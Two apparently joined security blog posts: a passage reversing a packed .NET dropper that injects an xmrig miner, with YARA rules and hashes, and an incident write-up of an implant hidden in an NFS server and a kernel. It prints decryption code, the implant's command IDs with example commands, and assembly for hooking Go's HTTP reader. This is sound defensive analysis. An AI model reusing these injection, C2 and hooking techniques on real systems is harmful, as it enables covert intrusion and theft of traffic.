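# XORing zeros reveals the effective key stream: "UUeoCoip" with 0x00 padding.
print(xor_payload(bytes(16)))
```

In practice this means that every odd-offset byte of the encrypted payload is left untouched, which is a handy pattern to spot when looking at the raw resource.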

When the payload is “finally” created, the assembly object is loaded in a thread.

Thread thread = new Thread(new ThreadStart(Program.AssemblyLoader)); 
thread.Start();

Third Stage

So if you believe that everything is done. Well, unfortunately, you are very wrong ! This is packed/obfuscated… again!

throw.gif

Without entering into some madness to understand the code, I note that there are three files right now in the resource folder.

resources.png

Two of them are XOR-encrypted payloads and one is a text file with Base64-encoded strings. When we look into the “shitty” code to understand the purpose of the text file, it turns out to be a Manifest Resource Stream, content that is embedded in the assembly at compile time. With a few lines of Python code, let’s see what we have when everything is decoded:

 => python3 manifest.py 
...
'RSRCNAME'
'RSRCPWD'
'Dotwall Evaluation'

The last entry is pretty interesting because it shows us that this stage is in fact packed with Dotwall, a .NET obfuscator that is not publicly available at this time (or so it seems).

So what is the goal of this stage?

First, it copies the first stage into the main user directory and keeps the new path in memory for future purposes. Then it deletes the alternate data stream named Zone.Identifier of this file, which erases the trace confirming that this malware was downloaded from an outside network.

Then it sets up a persistence trick with an Internet Shortcut file named “rTErod.url”, created in the Windows startup folder, which could probably explain why the Zone.Identifier task was done above.

[InternetShortcut]
URL=file:///C:/Users/user/bsdsjdpjcqdpcdq.exe

Then it checks whether the Visual Basic compiler is present on the machine and injects the resource “rWyMgsOzOKRu” into it. The way the program decrypts this file, with all the interactions between different classes and the manifest, runs to hundreds of lines of code, but I can summarize it with just 10 lines of C# source code.

byte[] buffer = File.ReadAllBytes("xplACLWqdLvY"); // Xor Key 
byte[] bytes = Encoding.Unicode.GetBytes("rWyMgsOzOKRu"); // Encrypted Payload

for (int i = 0; i < buffer.Length; i++) {
    buffer[i] ^= bytes[i % 16];
}

using (var decrypted = new FileStream("decrypted_resource.exe", FileMode.Create, FileAccess.Write)) {
    decrypted.Write(buffer, 0, buffer.Length);
}

This assembly is named “adderalldll” and relates to Adderall Protector.

AdderallDll.png

adderall_logo.png

adderall_topics

After some cleaning, this tool is called using reflection. The run() method of the new object class (Adderall) is invoked with some additional arguments:

  • @"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
  • ""
  • DecryptPayload(cryptedResource) // <= Our Final Unpacked Malware
  • true
Type Adderall_resource = exportedTypes[pos];
object Adderall = Activator.CreateInstance(Adderall_resource);
vbcPath = @"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe";

Adderall_resource.InvokeMember("run", BindingFlags.InvokeMethod, null, Adderall, new object[] {
 vbcPath, 
 "",      
 DecryptPayload(cryptedResource), 
 true 
});

Fourth Stage

So what do we have in adderall.dll? Well… This is obfuscated with Dotwall, and it looks like there are no embedded payload resources, just the manifest stream file. It means that we are very close to our final miner malware!

adderall_rsrc

So let’s see again what we have in the decoded manifest:

=> python3 manifest.py 
...
'kernel32'
'CreateProcessA'
'kernel32'
'GetThreadContext'
'kernel32'
'Wow64GetThreadContext'
'kernel32'
'SetThreadContext'
'kernel32'
'Wow64SetThreadContext'
'kernel32'
'ReadProcessMemory'
'kernel32'
'WriteProcessMemory'
'ntdll'
'NtUnmapViewOfSection'
'kernel32'
'VirtualAllocEx'
'kernel32'
'ResumeThread'
...
'Dotwall Evaluation'

From this list of APIs, we understand that the goal here is to perform process injection, with the vbc.exe process hosting the malware.
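As a rough illustration of how such a decoded list can be triaged, the sketch below checks whether the names cover the API chain commonly associated with process hollowing (RunPE). The set HOLLOWING_APIS and the function looks_like_runpe are my own assumptions for this example, not something extracted from the sample.

```python
# APIs commonly chained together for process hollowing (RunPE); an assumed checklist
HOLLOWING_APIS = {
    "CreateProcessA",
    "NtUnmapViewOfSection",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "SetThreadContext",
    "ResumeThread",
}


def looks_like_runpe(names):
    """Return (verdict, missing) for an iterable of decoded strings."""
    missing = HOLLOWING_APIS - set(names)
    return (not missing, sorted(missing))


# Strings taken from the decoded manifest output above
decoded = [
    "kernel32", "CreateProcessA", "GetThreadContext", "Wow64GetThreadContext",
    "SetThreadContext", "Wow64SetThreadContext", "ReadProcessMemory",
    "WriteProcessMemory", "ntdll", "NtUnmapViewOfSection", "VirtualAllocEx",
    "ResumeThread",
]
print(looks_like_runpe(decoded))
```

A full match is only a hint, since legitimate debuggers and some installers use the same calls.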

Fifth Stage

So now that our miner is finally deployed, let's analyze it. The first thing we see is that it is developed in C/C++.

The malware checks whether it is running on a 32-bit or 64-bit system with the help of IsWow64Process, and decides accordingly where to perform process injection:

  • If it's 32 bits, the miner will be behind wuapp.exe
  • If it's 64 bits, the miner will be behind notepad.exe

process_choice.png

Below is an example of a process injection into notepad.exe, running behind Winrar.exe, a child process of explorer.exe:

Process Injection

Reading the command line, it looks like we have an xmrig miner here: if we compare it with the help display, it's identical.

  -a, --algo=ALGO          cryptonight (default) or cryptonight-lite
  -o, --url=URL            URL of mining server
  -O, --userpass=U:P       username:password pair for mining server
  -u, --user=USERNAME      username for mining server
  -p, --pass=PASSWORD      password for mining server
  -t, --threads=N          number of miner threads
...
  -c, --config=FILE        load a JSON-format configuration file
...

To confirm that it's this specific miner, let's dump the memory at base address 0x400000:

Notepad_Miner

The PE header is erased and the binary is compressed with UPX

UPX_xmrig.png

…and with a quick search, our xmrig miner is right here 🙂

miner_xmrig.png

Miner config Setup

The malware generates a specific xmrig config file for the victim machine. First, it pushes the miner pool and the user account.

xmrig

Then, the typical xmrig config file is generated and saved into two files, “cfg” and “cfgi”.

config_file.png

In this example, the output config file is this :

{
  "algo": "cryptonight",
  "background": false,
  "colors": true,
  "retries": 5,
  "retry-pause": 5,
  "syslog": false,
  "print-time": 60,
  "av": 0,
  "safe": false,
  "cpu-priority": null,
  "cpu-affinity": null,
  "threads": 1,
  "pools": [
    { "url": "xmr.pool.minergate.com:45560", "user": "[email protected]", "pass": "x", "keepalive": false, "nicehash": false }
  ],
  "api": { "port": 0, "access-token": null, "worker-id": null }
}
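When triaging many dropped config files, the pool and account fields are the interesting part. Here is a minimal sketch for pulling them out, assuming the file is valid JSON with a "pools" array as in the example above; the function name and the user value in the sample are placeholders of mine.

```python
import json


def extract_pool_iocs(config_text):
    """Return (url, user) pairs from the "pools" array of an xmrig-style config."""
    config = json.loads(config_text)
    return [(pool.get("url"), pool.get("user")) for pool in config.get("pools", [])]


# Reduced sample; the user value is a placeholder, not the real account
sample = (
    '{"algo": "cryptonight", "threads": 1, "pools": '
    '[{"url": "xmr.pool.minergate.com:45560", "user": "victim@example.invalid", "pass": "x"}]}'
)
print(extract_pool_iocs(sample))
```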

Persistence

Another persistence mechanism is also added at this step: a registry key is created, and this entry is checked periodically.

registry

The executable file referenced by the registry key is in the same folder as the miner configuration files, and it is a legit vbc.exe binary 🙂

appdata

So at the end, you are here…

legit_vbc

Hiding Method

This malware checks if the task manager is launched.

FindTaskMgrExe

If it is, the malware kills the notepad.exe process when the miner is currently running. The miner is then not restarted as long as taskmgr remains open.

kill_notepad.png
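The hiding behaviour described above boils down to a small decision table. The sketch below models it with hypothetical names (next_action and the returned labels); the "start_miner" branch is my assumption about what happens once Task Manager is closed again.

```python
def next_action(process_names, miner_running):
    """Model of the hide-from-Task-Manager logic; returns a label, performs nothing."""
    names = {name.lower() for name in process_names}
    if "taskmgr.exe" in names:
        # Task Manager is open: stop mining and stay quiet until it is closed
        return "kill_miner" if miner_running else "wait"
    # Task Manager is closed: keep mining, or (assumed) start again
    return "keep_running" if miner_running else "start_miner"


print(next_action(["explorer.exe", "Taskmgr.exe"], miner_running=True))
```

For an analyst this also explains why CPU usage looks normal whenever Task Manager is open on an infected machine.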

Summary

  1. We have an executable that compiles a DLL and injects it into itself
  2. This DLL deploys another executable, which was hidden behind a fake PNG file and was also injected into the first payload
  3. In this program, a DLL named Adderall is invoked; it deploys the unpacked malware into the Visual Basic compiler with the help of RunPE
  4. Our final malware sets up a miner config and injects xmrig into wuapp.exe (32 bits) or notepad.exe (64 bits), depending on the operating system.

DU-IJlvXUAUrBRu.jpg

Yara rules

Xmrig Miner Malware

rule XmrigMinerMalware {
    meta:
        description = "Xmrig Miner Malware"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $s1 = "\\cfg" wide ascii
        $s2 = "\\cfgi" wide ascii
        $s3 = "\\notepad.exe" wide ascii
        $s4 = "\\wuapp.exe" wide ascii
        $s5 = "--show-window" wide ascii
        $s6 = "taskmgr.exe" wide ascii
        $s7 = "Miner" wide ascii
    condition:
        $mz at 0 and all of ($s*) 
}

Adderall Protector

rule Adderall {
    meta:
        description = "Adderall Protector"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $n1 = "#Blob" wide ascii
        $n2 = "#GUID" wide ascii
        $n3 = "#Strings" wide ascii

        $s1 = "adderalldll" wide ascii
    condition:
        $mz at 0 and (all of ($n*) and $s1)
}

Dotwall Obfuscator

rule DotWall {
    meta:
        description = "Dotwall Obfuscator"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $n1 = "#Blob" wide ascii
        $n2 = "#GUID" wide ascii
        $n3 = "#Strings" wide ascii

        $s1 = "RG90d2Fsb" wide ascii
    condition:
        $mz at 0 and (
            all of ($n*) and $s1
        )
}

IoC

[email protected] _

517AC5506A5488A1193686F66CB57AD3288C2258C510004EDB2F361B674526CC
AA28AA381B935EB98A6B3DEC4C86E1570EF142B041DB4255445C52A81F57A02F
40F5D5BBC054BA193B3D46BA1AE113AC9C9FCAFDDEC52CF02F82C4A22BF9F15F
0C5FC323873FBE693C1FF860282F035AD447050F8EC37FF2E662D087A949DFC9
7C23DA75BA54998363C4E278488F05588FB4E7D8201CCDAA870DD93F0328B911
BECDCC441E29D518D2258F0718000EBD0848ADB4CEFA00223F386A91FDB11677

Conclusion

This miner was pretty cool to reverse because it uses several different techniques. It was a good time (with some headaches) spent understanding and explaining the different tasks.

Happy Hunting

Happy Hunting!

APT Encounters of the Third Kind

24 March 2021 at 04:00

A few weeks ago an ordinary security assessment turned into an incident response whirlwind. It was definitely a first for me, and I was kindly granted permission to outline the events in this blog post. This investigation started scary but turned out to be quite fun, and I hope reading it will be informative to you too. I'll be back to posting about my hardware research soon.

How it started

Twice a year I am hired to do security assessments for a specific client. We have been working together for several years, and I had a pretty good understanding of their network and what to look for.

This time my POC, Klaus, asked me to focus on privacy issues and GDPR compliance. However, he asked me to first look at their cluster of reverse gateways / load balancers:

LB Architecture

I had some prior knowledge of these gateways, but decided to start by creating my own test environment first. The gateways run a custom Linux stack: basically a monolithic compiled kernel (without any modules), and a static GOlang application on top. The 100+ machines have no internal storage, but rather boot from external USB media that holds the kernel and the application. The GOlang app serves in two capacities: an init replacement and the reverse gateway software. During initialization it mounts /proc, /sys, devfs and so on, then mounts an NFS share hardcoded in the app. The NFS share contains the app's configuration, TLS certificates, blacklist data and a few more things. It starts listening on 443, filters incoming communication and passes valid requests on to different services in the production segment.

GW Architecture

I set up a self-contained test environment, and spent a day in black box examination. Having found nothing much I suggested we move on to looking at the production network, but Klaus insisted I continue with the gateways. Specifically he wanted to know if I could develop a methodology for testing if an attacker has gained access to the gateways and is trying to access PII (Personally Identifiable Information) from within the decrypted HTTP stream.

I couldn't SSH into the host (no SSH), so I figured we would have to add some kind of instrumentation to the GO app. Klaus still insisted I start by looking at the traffic before (red) and after the GW (green). He gave me access to a mirrored port on both sides so I could capture traffic to a standalone laptop he had prepared for me. I could access the laptop through an LTE modem, but was not allowed to upload data from it:

GW Architecture

The problem I faced now was how to find out what HTTPS traffic corresponded to requests with embedded PII. One possible avenue was to try and correlate the encrypted traffic with the decrypted HTTP traffic. This proved impossible using timing alone. However, inspecting the decoded traffic I noticed the GW app adds an 'X-Orig-Connection' header with the four-tuple of the TLS connection! Yay!

Original connection

I wrote a small python program to scan the port 80 traffic capture and create a mapping from each four-tuple TLS connection to a boolean - True for connection with PII and False for all others:

10.4.254.254,443,[Redacted],43404,376106847.319,False
10.4.254.254,443,[Redacted],52064,376106856.146,False
10.4.254.254,443,[Redacted],40946,376106856.295,False
10.4.254.254,443,[Redacted],48366,376106856.593,False
10.4.254.254,443,[Redacted],48362,376106856.623,True
10.4.254.254,443,[Redacted],45872,376106856.645,False
10.4.254.254,443,[Redacted],40124,376106856.675,False 
...
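The mapping step can be sketched roughly as follows. This is not the program I used, just a minimal illustration under assumptions: the header value is taken to be a comma-separated four-tuple, and "PII" is approximated by an e-mail-looking string in the body; classify_request and PII_PATTERN are hypothetical names.

```python
import re

# Hypothetical PII marker for the example: anything that looks like an e-mail address
PII_PATTERN = re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+")


def classify_request(raw_request):
    """Return (four_tuple, has_pii) for one decoded HTTP request, or None if the header is absent."""
    head, _, body = raw_request.partition("\r\n\r\n")
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "x-orig-connection":
            four_tuple = tuple(part.strip() for part in value.split(","))
            return four_tuple, bool(PII_PATTERN.search(body))
    return None


request = (
    "POST /signup HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "X-Orig-Connection: 10.4.254.254,443,198.51.100.7,48362\r\n"
    "\r\n"
    "email=bob@example.com"
)
print(classify_request(request))
```

Each result can then be written out as one CSV row per connection, in the same shape as the listing above.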

With this in mind I could now extract the data from the PCAPs and do some correlations. After a few long hours getting scapy to actually parse timestamps consistently enough for comparisons, I had a list of connection timing information correlated with PII. A few more fun hours with Excel and I got histogram graphs of time vs count of packets. Everything looked normal for the HTTP traffic, although I expected more of a normal distribution than the power-law type thingy I got. Port 443 initially looked the same, and I got the normal distribution I expected. But when filtering for PII something was seriously wrong. The distribution was skewed and shifted to longer time frames. And there was nothing similar on the port 80 end.

Histograms

My only explanation was that something was wrong with my testing setup (the blue bars) vs. the real live setup (the orange bars). I wrote on our slack channel 'I think my setup is sh*t, can anyone resend me the config files?', but this was already very late at night, and no one responded. Having a slight OCD I couldn't let this go. To my rescue came another security? feature of the GWs: they restarted daily, staggered one by one, with about 10 minutes between hosts. This means that every ten minutes or so one of them would reboot, and thus reload its configuration files over NFS. And since I could see the NFS traffic through the port mirror I had access to, I reckoned I could get the production configuration files from the NFS capture (bottom dotted blue line in the diagram before).

So to cut a long story short I found the NFS read reply packet, and got the data I needed. But … why the heck is eof 77685??? Come on people, it's 3:34AM!

What's more, the actual data was 77685 bytes, exactly 8192 bytes more than the 'Read length'. The byte distribution of that data was pretty uniform (i.e. high entropy), suggesting it was encrypted. The file I had was definitely not encrypted.

First NFS capture

Histogram of extra 8192 bytes:

NFS capture hist
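For anyone wanting to repeat the "is this blob encrypted?" check without Excel, a Shannon entropy estimate over the bytes is usually enough. A minimal sketch (the function name is mine):

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for a perfectly uniform distribution."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


if __name__ == "__main__":
    print(shannon_entropy(b"\x00" * 8192))           # constant data
    print(shannon_entropy(bytes(range(256)) * 32))   # every byte value equally frequent
```

Values close to 8 bits per byte over a block of a few kilobytes point to encrypted or compressed content, while plain config files land much lower.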

When I mounted the NFS export myself I got a normal EOF value of 1!

NFS capture hist

What the hell is this?

Comparing the capture from my testing machine with the one from the port mirror I saw something else weird:

NFS capture hist

For other NFS open requests (on all of my test system captures and for other files in the production system) we get:

NFS capture hist

Spot the difference?

The open id: string became open-id:. Was I dealing with some corrupt packet? But the exact same problem reappeared the next time blacklist.db was sent over the wire by another GW host.

Time to look at the kernel source code:

NFS capture hist

The β€œopen id” string is hardcoded. What's up?

After a good night's sleep, and no beer this time, I repeated the experiment. Having convinced myself I was not hallucinating, I decided to compare the source code of the exact kernel version with the kernel binary I got.

What I expected to see was this (from nfs4xdr.c):

static inline void encode_openhdr(struct xdr_stream *xdr, const struct nfs_openargs *arg)
{
    __be32 *p;
 /*
 * opcode 4, seqid 4, share_access 4, share_deny 4, clientid 8, ownerlen 4,
 * owner 4 = 32
 */
    encode_nfs4_seqid(xdr, arg->seqid);
    encode_share_access(xdr, arg->share_access);
    p = reserve_space(xdr, 36);
    p = xdr_encode_hyper(p, arg->clientid);
    *p++ = cpu_to_be32(24);
    p = xdr_encode_opaque_fixed(p, "open id:", 8);
    *p++ = cpu_to_be32(arg->server->s_dev);
    *p++ = cpu_to_be32(arg->id.uniquifier);
    xdr_encode_hyper(p, arg->id.create_time);
}

Running binwalk -e -M bzImage I got the internal ELF image, and opened it in IDA. Of course I didn't have any symbols, but I got nfs4_xdr_enc_open() from /proc/kallsyms, and from there went to encode_open(), which led me to encode_openhdr(). With some help from hex-rays I got code that looked very similar, but with one key difference:

static inline void encode_openhdr(struct xdr_stream *xdr, const struct nfs_openargs *arg)
{
    ...
    p = xdr_encode_opaque_fixed(p, unknown_func("open id:", arg), 8);
    ...
}

The function unknown_func was pretty long and complicated, but in the end it sometimes decided to replace the space between 'open' and 'id' with a hyphen.

Does the NFS server care? Apparently this string is some opaque client identifier that is ignored by the NFS server, so no one would see the difference. That is unless they were trying to extract something from an NFS stream, and obviously this was not a likely scenario. OK, back to the weird 'eof' thingy from the NFS server.

The NFS Server

The server was running the 'NFS-ganesha-3.3' package. This is a very modular user-space NFS server that is implemented as a series of loadable modules called FSALs. For example support for files on the regular filesystem is implemented through a module called libfsalvfs.so. Having verified all the files on disk had the same SHA1 as the distro package, I decided to dump the process memory. I didn't have any tools on the host, so I used GDB which helpfully was already there. Unexpectedly GDB was suddenly killed, the file I specified as output got erased, and the nfs server process restarted.

I took the dump again but there was nothing special there!

I was pretty suspicious at this time, and wanted to recover the original dump file from the first dump. Fortunately for me I was dumping the file to the laptop, again over NFS. The file had been deleted, but I managed to recover it from the disk on that server.

2nd malicious binary

The memory dump was truncated, but had a corrupt version of NFS-ganesha inside. There were two libfsalvfs.so libraries loaded: the original one and an injected SO file with the same name. The injected file was clearly malicious. The main binary was patched in a few places, and the function table pointing into libfsalvfs.so was replaced with one pointing into the alternate libfsalvfs.so. The alternate file was compiled from NFS-ganesha sources, but modified to include new and improved (wink wink) functionality.

The most interesting of the new functionality were two separate implementations of covert channels.

The first one we encountered already:

  • When an open request comes in with 'open-id' instead of 'open id', the file handle is marked. This change is opaque to the NFS server, so unpatched servers just ignore it and nothing much happens.
  • On an infiltrated NFS server, when a file handle opened this way is read, the server appends a payload taken from the malware's runtime storage after the last block, and the on-the-wire 'eof' value is changed to the new total size. An unpatched kernel (which shouldn't really happen, since it marked the file in the first place) will just ignore the extra bytes. The EOF value is used as a bool, i.e. it is checked for zero or non-zero rather than for a specific value, so a large integer value doesn't change anything in the flow of an unmodified kernel.
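To make the trick concrete, here is a toy model of the two sides. It deliberately ignores the real NFS wire format and only reproduces the arithmetic: the function names are hypothetical, and the sizes are the ones from the capture (a 77685-byte reply carrying 8192 extra bytes).

```python
def patched_read_reply(file_data: bytes, payload: bytes, marked: bool):
    """Toy model of the reply built by the modified server: returns (eof, data)."""
    if marked and payload:
        data = file_data + payload
        return len(data), data      # 'eof' now carries the new total size
    return 1, file_data             # normal reply: 'eof' is just a flag


def unmodified_client_read(eof: int, data: bytes, read_length: int) -> bytes:
    """A stock client only tests eof for zero / non-zero and keeps read_length bytes."""
    if eof == 0:
        raise ValueError("not at end of file in this toy example")
    return data[:read_length]


file_data = b"A" * (77685 - 8192)
payload = b"B" * 8192
eof, data = patched_read_reply(file_data, payload, marked=True)
print(eof, len(data), unmodified_client_read(eof, data, len(file_data)) == file_data)
```

From a defender's point of view, an 'eof' value other than 0 or 1, or reply data longer than the stated read length, is exactly the anomaly to look for in a capture.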

The second covert channel is used for command and control, and is implemented in the VFS code as a fake directory.

Any writes to /<export>/.snapshot/meta/<cmdid> are handled by the malware code and not passed on to the FS. They are pseudo-files that implement commands through read and write operations.

The malware implemented the following commands:

  • 1701 - self destruct
  • 1702 - set auto self destruct time
  • 1703 - run shell command
  • 1704 - load SO file from buffer specified in command
  • 1706 - get basic system description
  • 1707 - get network connections
  • 170A - upgrade to new SO file
  • 74201 - put buffer in memory dict by ID
  • 74202 - get buffer from memory dict by ID
  • 74650 - put a payload in memory for the first covert channel
  • 74651 - arm the first covert channel
  • 74652 - disarm the first covert channel

For example cp payload.so /mnt/server/.snapshot/meta/1704 will load the SO file in the NFS ganesha process on the target server, and echo 1616580589 > /mnt/server/.snapshot/meta/1702 will set an autodestruct time. Reading this file will retrieve the time.
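If you are hunting for this in NFS traces or file access logs, the path layout is easy to match. The sketch below maps a path to the command description from the list above; the table mirrors that list, while the function name describe_meta_path is my own.

```python
# Command IDs and descriptions copied from the list above
COMMANDS = {
    "1701": "self destruct",
    "1702": "set auto self destruct time",
    "1703": "run shell command",
    "1704": "load SO file from buffer specified in command",
    "1706": "get basic system description",
    "1707": "get network connections",
    "170A": "upgrade to new SO file",
    "74201": "put buffer in memory dict by ID",
    "74202": "get buffer from memory dict by ID",
    "74650": "put a payload in memory for the first covert channel",
    "74651": "arm the first covert channel",
    "74652": "disarm the first covert channel",
}


def describe_meta_path(path):
    """Return the command description for .../.snapshot/meta/<cmdid>, or None for other paths."""
    parts = path.strip("/").split("/")
    if len(parts) >= 3 and parts[-3:-1] == [".snapshot", "meta"]:
        return COMMANDS.get(parts[-1].upper(), "unknown command")
    return None


print(describe_meta_path("/mnt/server/.snapshot/meta/1704"))
```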

The self destruct command (0x1701) is very interesting - it sends a UDP broadcast on port 41701 with a random payload of size 321 bytes, and then restarts a clean NFS-ganesha. I guess this is some kind of network signalling.

It appears the malware has a watchdog that iterates over all /proc/<pid>/fd/* links every 25ms, and if a link is open to /proc/<malware pid>/maps or /proc/<malware pid>/smaps or /proc/<malware pid>/mem it:

  • kills the offending process,
  • deletes any writeable file handle it had opened (before it was killed) in /proc/<pid>/fd/, first trying to wipe it,
  • calls the self destruct command (0x1701).
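The detection half of that watchdog is simple enough to reproduce for testing your own tooling against it. The sketch below only lists which PIDs hold a descriptor on the maps, smaps or mem file of a given process; it takes the proc root as a parameter so it can be pointed at a fake directory tree. All names are hypothetical and nothing here is lifted from the binary.

```python
import os


def watched_targets(pid):
    """Paths the watchdog is described as caring about for a given PID."""
    return {f"/proc/{pid}/{name}" for name in ("maps", "smaps", "mem")}


def find_observers(proc_root, target_pid):
    """Return sorted PIDs holding an fd link that points at maps/smaps/mem of target_pid."""
    targets = watched_targets(target_pid)
    observers = set()
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            links = os.listdir(fd_dir)
        except OSError:
            continue                      # process vanished or access denied
        for fd in links:
            try:
                if os.readlink(os.path.join(fd_dir, fd)) in targets:
                    observers.add(int(entry))
            except OSError:
                continue                  # descriptor closed in the meantime
    return sorted(observers)


if __name__ == "__main__":
    print(find_observers("/proc", os.getpid()))
```

Knowing this, a dump tool that reads memory by other means (for example from a hypervisor snapshot) avoids tripping the check.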

Further forensics

Let's go back to that awful Saturday I triggered the self-destruct. Having a faint understanding that I had triggered something (this was before I reversed the devil), I asked Klaus to disconnect all the network connections to the outer world and we started taking memory dumps of whatever we could, storing them all on the laptop. In hindsight we destroyed quite a bit of evidence by triggering more self destructs in other subnets, but I think the self destruct signal had already gone out to the bad guys through a different piece of malware that I later partially recovered, and which probably "heard" the UDP distress signal (that's what it was called in the binary, not my naming).

After getting all the forensics the client insisted on reconnecting his systems to the web, as they were "losing money". I switched from forensics to reversing. In the process, while inspecting the malicious libfsalvfs.so I discovered the commands I mentioned above, and discovered a "feature" that helped me fill in more pieces of the puzzle.

When reversing malware you always find some feeble attempt to obfuscate strings using XOR or RC4, or just scrambling the letter ordering. In this case I pretty quickly found a function I called get_obfuscated_string(buffer, string_id). The difference, however, was that this one was just horrendous, practically irreversible:

NFS capture hist

It had like a billion nested switches:

NFS capture hist

I think they let some intern fresh out of college write that one. It seems the complete list of strings used by the tool is encoded inside a tree of nested switches, with a variable length encoding, e.g. in one branch the 2nd level might have 3 bits, in another it might have 5 and in a third only a single bit. Some kind of prefix tree if I remember anything from Uni.

Eventually I managed to write code to just brute force the function:

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string>
#include <set>

int main(int argc, char* argv[])
{
	// error handling code omitted
	const char* filename = (argc > 1) ? argv[1] : "reconstructed.elf";
	// argv[2] only exists when at least two arguments were passed
	unsigned long offset = (argc > 2) ? strtoul(argv[2], NULL, 16) : 0x22a0;

	int fd = open(filename, O_RDONLY);
	struct stat stbuf;
	fstat(fd, &stbuf);
	const char* addr = (char*)mmap(NULL, stbuf.st_size, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0);
	close(fd);
	const char* base = addr + offset;

	typedef int (*entry_t)(char* outbuf, int id);
	entry_t entry = (entry_t)base;
	std::set<std::string> found;
	char buffer[1024];
	
	for(long bits = 1; bits < 64; ++ bits) {
		bool any_new = false;
		// 1L keeps the shift in a long; a plain int would overflow for bits >= 31
		for(long id = (bits == 1) ? 0 : (1L << (bits - 1)); id < (1L << bits); ++ id) {
			int status = entry(buffer, id);
			if(status == 0)
				continue;
			if(found.find(buffer) != found.end())
				continue;
			found.insert(buffer);
			printf("Got '%s'! [0x%lx]\n", buffer, id);
			any_new = true;
		}
		if(!any_new)
			break;
	}

	return 0;
}

This first binary had the following strings (I am keeping 3 to myself as they have client related info):

'/proc/self/mem', 
'/proc/self/maps',
'/proc/self/cwd',
'/proc/self/environ',
'/proc/self/fd/%d',
'/proc/self/fdinfo/%d',
'/proc/self/limits',
'/proc/self/cgroup',
'/proc/self/exe',
'/proc/self/cmdline',
'/proc/self/mounts',
'/proc/self/smaps',
'/proc/self/stat',
'/proc/%d/mem', 
'/proc/%d/maps',
'/proc/%d/cwd',
'/proc/%d/environ',
'/proc/%d/fd/%d',
'/proc/%d/fdinfo/%d',
'/proc/%d/limits',
'/proc/%d/cgroup',
'/proc/%d/exe',
'/proc/%d/cmdline',
'/proc/%d/mounts',
'/proc/%d/smaps',
'/proc/%d/stat',        
'nfs',
'nfs4',
'tmpfs',
'devtmpfs',
'procfs',
'sysfs',
'WSL2',
'/etc/os-release',
'/etc/passwd',
'/etc/lsb-release',
'/etc/debian_version',
'/etc/redhat-release',
'/home/%s/.ssh',
'/var/log/wtmp',
'/var/log/syslog',
'/var/log/auth.log',
'/var/log/cron.log',
'/var/log/syslog.log',
'/etc/netplan/*.yaml',
'/etc/yp.conf',
'/var/yp/binding/',
'/etc/krb5.conf',
'/var/kerberos/krb5kdc/kdc.conf',
'/var/log/ganesha.log',
'/etc/ganesha/ganesha.conf',
'/etc/ganesha/exports',
'/etc/exports',
'Error: init failed',
'DELL',
'/usr/lib/x86_64-linux-gnu/libnfs.so.4',
'/tmp/.Test-unix/.fa76c5adb8c04239ff3034106842773b',
'Error: config missing',
'Error: sysdep missing',
'Running',
'LOG',
'/usr/lib/x86_64-linux-gnu/ganesha/libfsalvfs.so',
'none',
'/etc/sudoers',
'/proc/net/tcp',
'/proc/net/udp',
'/etc/selinux/config',
'libdl.so.2',
'libc-',
'.so',
'cluster-config',
'recovery-signal',

Eureka Moment

Staring endlessly at this weird function I thought to myself: maybe I can look for code that is structured like this in all the dumps we obtained. We have all those blocks of mov byte ptr [rdi+?], '?':

MoveRDI

So let's look for blocks of code that are highly dense with these opcodes:

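import sys

with open(sys.argv[1], 'rb') as f:
    data = f.read()

# STATE = [start offset, length so far, number of matching opcodes]
STATE = None
for i in range(len(data) - 6):
    # c6 47 xx yy encodes `mov byte ptr [rdi+xx], yy`
    # (indexing bytes yields ints in Python 3, so no ord() is needed)
    if data[i] == 0xc6 and data[i + 1] == 0x47:
        if STATE and (STATE[0] + STATE[1] + 0x40) >= i:
            # close enough to the current run: extend it
            STATE[1] = i - STATE[0]
            STATE[2] += 1
        else:
            if STATE and STATE[2] >= 20:
                print('Found region at 0x%x - 0x%x' % (STATE[0], STATE[0] + STATE[1]))
            STATE = [i, 4, 1]

# report the last run, which the loop itself never flushes
if STATE and STATE[2] >= 20:
    print('Found region at 0x%x - 0x%x' % (STATE[0], STATE[0] + STATE[1]))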

And I found them. Oh I did. Some adjustment even led to a version for ARM systems:

MoveRDIARM

The GOlang thingy

I finally found the payload that was sent over to the GW machines. It had 2 stages: the first was the 8192-byte buffer loaded through the first covert channel. The kernel was modified to inject this buffer into the GOlang application and hook it. This will get fairly technical, but I enjoyed it and so will you:

  • First note that in the Golang stdlib an HTTP connection can be read through the net/http.(*connReader).Read function. The calls are made through an io.Reader interface, i.e. through a virtual table, so the call locations cannot be statically identified,
  • The kernel inject begins by allocating a bunch of RWX memory immediately after the GOlang binary - let's call it the trampoline area. It will hold two types of generated trampoline functions,
  • Next, the ELF symbol table is used to find the 'net/http.(*connReader).Read' symbol,
  • What we'll call the 1st trampoline function (code below) is copied to the trampoline area, patching the area marked with HERE with the first 9 bytes of net/http.(*connReader).Read,
  • mprotect(net_http_connReader_read & ~0xfff, 8192, PROT_EXEC | PROT_READ | PROT_WRITE)
  • The beginning of net/http.(*connReader).Read is overwritten with a near jump into the trampoline, using 5 of the 9 original bytes taken by the 'mov rcx, fs:…' instruction that is the preamble to the function.
First trampoline function

     pop     rax            
     pop     rcx
     push    rcx
     push    rax
     mov     r11, cs:qword_<relocated>
     mov     rdi, rcx
     call    qword ptr [r11+8]
     pop     rax
     pop     rcx
     push    rcx
     mov     rcx, fs:0FFFFFFFFFFFFFFF8h <---- HERE
     cmp     rsp, [rcx+10h]
     jmp     rax

